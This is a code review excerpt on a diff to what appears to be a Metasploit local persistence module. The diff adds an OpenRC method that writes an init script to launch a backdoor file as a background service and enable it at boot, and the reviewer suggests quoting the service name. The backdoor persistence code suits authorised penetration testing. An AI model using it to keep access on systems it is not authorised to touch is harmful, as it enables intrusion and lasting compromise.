modules/exploits/linux/local/service_persistence.rb

```diff
@@ -397,4 +408,34 @@ def system_v(backdoor_path, backdoor_file, runlevel, has_updatercd)
       cmd_exec("/etc/init.d/#{service_filename} start")
     end
   end
+
+  def openrc(backdoor_path, backdoor_file)
+    # https://wiki.alpinelinux.org/wiki/Writing_Init_Scripts
+    # https://wiki.alpinelinux.org/wiki/OpenRC
+    # https://github.com/OpenRC/openrc/blob/master/service-script-guide.md
+    script = %{#!/sbin/openrc-run
+name=#{backdoor_file}
+command=/bin/sh
+command_args="#{backdoor_path}/#{backdoor_file}"
+pidfile="/run/${RC_SVCNAME}.pid"
+command_background="yes"
+}
+
+    service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
+    service_name = "/etc/init/#{service_filename}"
+    vprint_status("Writing service: #{service_name}")
+    upload_and_chmodx(service_name, script)
+    if !file_exist?(service_name)
+      print_error('File not written, check permissions.')
+      return
+    end
+
+    if datastore['EnableService']
+      vprint_status('Enabling service')
+      cmd_exec("rc-update add #{service_filename}")
```

Comment:
Because the SERVICE datastore argument can be used instead of random alphabetic characters, this should be placed in single quotes to ensure that it works if there's a space in the service name.

```suggestion
      cmd_exec("rc-update add '#{service_filename}'")
```